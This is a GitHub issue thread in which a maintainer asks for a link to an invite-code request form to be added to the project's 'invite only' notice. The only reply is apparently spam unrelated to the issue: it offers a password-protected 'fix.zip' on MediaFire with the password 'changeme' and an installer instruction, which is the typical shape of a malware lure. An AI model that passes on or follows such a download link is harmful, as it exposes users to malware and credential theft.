### ISSUE TITLE
Add link to invite code request form

### ISSUE THREAD

**Issue by yoavartzi** [lil-lab/recnet#257]
Please add a link to the invite code request form:
https://forms.gle/pBzfxvLifZkrVz1J7

We can add this link in the "invite only" notification here:
<img width="874" alt="image" src="https://github.com/user-attachments/assets/3b90fba6-9d34-4664-a56d-feb601184446">

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
